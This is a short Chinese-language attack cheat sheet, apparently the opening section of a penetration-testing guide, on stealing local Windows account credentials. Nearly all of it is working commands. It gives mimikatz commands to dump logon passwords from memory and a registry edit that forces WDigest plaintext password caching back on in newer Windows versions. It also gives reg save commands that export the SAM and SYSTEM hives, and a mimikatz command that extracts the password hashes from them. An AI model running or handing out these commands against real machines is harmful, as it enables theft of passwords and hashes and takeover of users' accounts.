0x01 获取本地帐户密码
1.1 本地执行
下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行:
(不是管理员会报错)
#提升权限
privilege::debug
#抓取密码
sekurlsa::logonpasswords
当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
cmd修改注册表命令:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重启或用户重新登录后可以成功抓取
1.2 SAM表获取hash
#导出SAM数据
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM
#使用mimikatz提取hash
lsadump::sam /sam